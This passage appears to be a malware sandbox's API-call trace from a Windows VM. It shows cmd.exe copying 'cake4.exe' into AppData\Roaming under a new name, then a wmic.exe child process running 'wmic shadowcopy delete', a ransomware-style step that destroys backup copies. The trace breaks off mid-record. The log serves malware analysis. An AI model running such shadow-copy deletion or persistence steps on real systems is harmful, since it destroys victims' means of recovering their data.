lpName="APPDATA", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0064.827] GetProcessHeap () returned 0x720000 [0064.827] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x735090 | out: hHeap=0x720000) returned 1 [0064.827] GetProcessHeap () returned 0x720000 [0064.827] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x73ca88 | out: hHeap=0x720000) returned 1 [0064.828] GetProcessHeap () returned 0x720000 [0064.828] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x738a70 | out: hHeap=0x720000) returned 1 [0064.828] _wcsicmp (_String1="copy", _String2=")") returned 58 [0064.828] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0064.828] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0064.828] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0064.829] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0064.829] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0064.829] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0064.829] GetProcessHeap () returned 0x720000 [0064.829] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x58) returned 0x735090 [0064.829] GetProcessHeap () returned 0x720000 [0064.829] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x12) returned 0x7350f0 [0064.833] GetProcessHeap () returned 0x720000 [0064.833] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xec) returned 0x735110 [0064.834] GetConsoleTitleW (in: lpConsoleTitle=0x43f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0064.835] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0064.835] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0064.835] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0064.835] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0064.835] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0064.835] GetProcessHeap () returned 0x720000 [0064.835] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1d0) returned 0x735208 [0064.835] GetProcessHeap () returned 0x720000 [0064.835] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x735208, Size=0xec) returned 0x735208 [0064.835] GetProcessHeap () returned 0x720000 [0064.835] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x735208) returned 0xec [0064.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0064.837] GetProcessHeap () returned 0x720000 [0064.837] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xf6) returned 0x735300 [0064.837] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.837] GetProcessHeap () returned 0x720000 [0064.837] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2c) returned 0x735400 [0064.837] GetProcessHeap () returned 0x720000 [0064.837] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2c) returned 0x735438 [0064.837] GetProcessHeap () returned 0x720000 [0064.837] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x735470 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0064.837] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0064.838] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0064.838] GetProcessHeap () returned 0x720000 [0064.838] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x735470 | out: hHeap=0x720000) returned 1 [0064.839] GetProcessHeap () returned 0x720000 [0064.839] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x735470 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.839] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0064.840] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0064.840] GetProcessHeap () returned 0x720000 [0064.840] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x735470 | out: hHeap=0x720000) returned 1 [0064.840] GetProcessHeap () returned 0x720000 [0064.840] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1d0) returned 0x7207f0 [0064.840] GetProcessHeap () returned 0x720000 [0064.840] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7207f0, Size=0xec) returned 0x7207f0 [0064.840] GetProcessHeap () returned 0x720000 [0064.840] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7207f0) returned 0xec [0064.840] GetProcessHeap () returned 0x720000 [0064.841] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2c) returned 0x735470 [0064.841] GetProcessHeap () returned 0x720000 [0064.841] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x258) returned 0x7208e8 [0064.841] _wcsicmp (_String1="cake4.exe", _String2=".") returned 53 [0064.841] _wcsicmp (_String1="cake4.exe", _String2="..") returned 53 [0064.841] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe")) returned 0x20 [0064.841] GetProcessHeap () returned 0x720000 [0064.841] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2c) returned 0x7354a8 [0064.841] GetProcessHeap () returned 0x720000 [0064.841] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x258) returned 0x720b48 [0064.841] _wcsicmp (_String1="mhtop32bit.exe", _String2=".") returned 63 [0064.841] _wcsicmp (_String1="mhtop32bit.exe", _String2="..") returned 63 [0064.841] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x43f4f0, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x43f4f0, ReturnLength=0x0) returned 0x0 [0064.841] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x43f4f8, ProcessInformationLength=0x4) returned 0x0 [0064.841] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0064.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", fInfoLevelId=0x1, lpFindFileData=0x7208f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7208f0) returned 0x7354e0 [0064.842] GetProcessHeap () returned 0x720000 [0064.842] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x14) returned 0x735520 [0064.842] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", nBufferLength=0x104, lpBuffer=0x43e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", lpFilePart=0x0) returned 0x3c [0064.842] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", _String2="con") returned -53 [0064.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43e9fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x78 [0064.842] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0064.842] _get_osfhandle (_FileHandle=3) returned 0x78 [0064.842] GetFileType (hFile=0x78) returned 0x1 [0064.842] SetErrorMode (uMode=0x0) returned 0x0 [0064.842] SetErrorMode (uMode=0x1) returned 0x0 [0064.842] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", nBufferLength=0x208, lpBuffer=0x43ecb0, lpFilePart=0x43ea34 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", lpFilePart=0x43ea34*="cake4.exe") returned 0x2f [0064.843] SetErrorMode (uMode=0x0) returned 0x1 [0064.843] _get_osfhandle (_FileHandle=3) returned 0x78 [0064.843] ReadFile (in: hFile=0x78, lpBuffer=0x110000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43eaa0, lpOverlapped=0x0 | out: lpBuffer=0x110000*, lpNumberOfBytesRead=0x43eaa0*=0x200, lpOverlapped=0x0) returned 1 [0064.844] SetErrorMode (uMode=0x0) returned 0x0 [0064.844] SetErrorMode (uMode=0x1) returned 0x0 [0064.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", nBufferLength=0x208, lpBuffer=0x43e610, lpFilePart=0x43e608 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", lpFilePart=0x43e608*="mhtop32bit.exe") returned 0x3c [0064.844] SetErrorMode (uMode=0x0) returned 0x1 [0064.844] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe") returned 3 [0064.844] GetProcessHeap () returned 0x720000 [0064.844] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x258) returned 0x720da8 [0064.844] _wcsicmp (_String1="mhtop32bit.exe", _String2=".") returned 63 [0064.844] _wcsicmp (_String1="mhtop32bit.exe", _String2="..") returned 63 [0064.844] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe")) returned 0xffffffff [0064.844] GetLastError () returned 0x2 [0064.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", nBufferLength=0x104, lpBuffer=0x43e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", lpFilePart=0x0) returned 0x3c [0064.844] SetErrorMode (uMode=0x0) returned 0x0 [0064.844] SetErrorMode (uMode=0x1) returned 0x0 [0064.845] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", nBufferLength=0x208, lpBuffer=0x43e610, lpFilePart=0x43e608 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", lpFilePart=0x43e608*="mhtop32bit.exe") returned 0x3c [0064.845] SetErrorMode (uMode=0x0) returned 0x1 [0064.845] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe") returned 3 [0064.845] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe")) returned 0xffffffff [0064.845] CopyFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x49ea41b4, dwCopyFlags=0x0) returned 1 [0064.957] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe")) returned 0x2020 [0064.957] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", dwFileAttributes=0x2020) returned 1 [0064.958] _close (_FileHandle=3) returned 0 [0064.958] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0064.999] GetFileType (hFile=0xffffffff) returned 0x0 [0064.999] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0064.999] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x43ea44) returned 0 [0064.999] FindNextFileW (in: hFindFile=0x7354e0, lpFindFileData=0x7208f0 | out: lpFindFileData=0x7208f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8116700, ftCreationTime.dwHighDateTime=0x1d62226, ftLastAccessTime.dwLowDateTime=0xf8a9fd80, ftLastAccessTime.dwHighDateTime=0x1d62226, ftLastWriteTime.dwLowDateTime=0x39dae700, ftLastWriteTime.dwHighDateTime=0x1d62200, nFileSizeHigh=0x0, nFileSizeLow=0x93400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cake4.exe", cAlternateFileName="")) returned 0 [0064.999] GetLastError () returned 0x12 [0065.000] FindClose (in: hFindFile=0x7354e0 | out: hFindFile=0x7354e0) returned 1 [0065.000] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x43f4f0, ProcessInformationLength=0x4) returned 0x0 [0065.000] _vsnwprintf (in: _Buffer=0x49ea5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x43f4cc | out: _Buffer=" 1") returned 9 [0065.000] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.000] GetFileType (hFile=0x7) returned 0x2 [0065.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0065.001] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x43f458 | out: lpMode=0x43f458) returned 1 [0065.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.001] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x43f48c | out: lpConsoleScreenBufferInfo=0x43f48c) returned 1 [0065.001] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0065.002] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x43f4cc | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0065.002] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x43f4b0, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x43f4b0*=0x1b) returned 1 [0065.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.003] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0065.004] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.004] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0065.004] SetConsoleInputExeNameW () returned 0x1 [0065.004] GetConsoleOutputCP () returned 0x1b5 [0065.005] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0065.005] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.005] exit (_Code=0) Process: id = "18" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x413d2000" os_pid = "0x9a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x7f4" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x864 [0065.721] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cff0c | out: lpSystemTimeAsFileTime=0x1cff0c*(dwLowDateTime=0x1b9179e0, dwHighDateTime=0x1d62227)) [0065.721] GetCurrentProcessId () returned 0x9a4 [0065.721] GetCurrentThreadId () returned 0x864 [0065.721] GetTickCount () returned 0x114a120 [0065.721] QueryPerformanceCounter (in: lpPerformanceCount=0x1cff04 | out: lpPerformanceCount=0x1cff04*=18567674385) returned 1 [0065.723] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0065.723] __set_app_type (_Type=0x1) [0065.723] __p__fmode () returned 0x770331f4 [0065.723] __p__commode () returned 0x770331fc [0065.723] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xacdc15) returned 0x0 [0065.724] __wgetmainargs (in: _Argc=0xadc5e8, _Argv=0xadc5f0, _Env=0xadc5ec, _DoWildCard=0, _StartInfo=0xadc5fc | out: _Argc=0xadc5e8, _Argv=0xadc5f0, _Env=0xadc5ec) returned 0 [0066.505] ??0CHString@@QAE@XZ () returned 0xadc28c [0066.505] malloc (_Size=0x18) returned 0x1813b8 [0077.471] malloc (_Size=0x38) returned 0x1813d8 [0077.471] malloc (_Size=0x28) returned 0x183dc8 [0077.471] malloc (_Size=0x18) returned 0x183df8 [0077.471] malloc (_Size=0x24) returned 0x183e18 [0077.605] malloc (_Size=0x18) returned 0x183e48 [0077.605] malloc (_Size=0x18) returned 0x183e68 [0077.606] ??0CHString@@QAE@XZ () returned 0xadc594 [0077.606] malloc (_Size=0x18) returned 0x183e88 [0077.606] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0077.606] SetConsoleCtrlHandler (HandlerRoutine=0xac6b6f, Add=1) returned 1 [0077.606] _onexit (_Func=0xad2f1f) returned 0xad2f1f [0077.607] _onexit (_Func=0xad2f2e) returned 0xad2f2e [0077.607] _onexit (_Func=0xad2f42) returned 0xad2f42 [0077.607] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.607] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0077.610] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0077.949] CoCreateInstance (in: rclsid=0xa96c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa96b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xadc1b0 | out: ppv=0xadc1b0*=0x990828) returned 0x0 [0077.961] GetCurrentProcess () returned 0xffffffff [0077.961] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1cfdb4 | out: TokenHandle=0x1cfdb4*=0x108) returned 1 [0077.961] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfdb0 | out: TokenInformation=0x0, ReturnLength=0x1cfdb0) returned 0 [0077.961] malloc (_Size=0x118) returned 0x182788 [0077.961] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x182788, TokenInformationLength=0x118, ReturnLength=0x1cfdb0 | out: TokenInformation=0x182788, ReturnLength=0x1cfdb0) returned 1 [0077.961] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x182788*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, 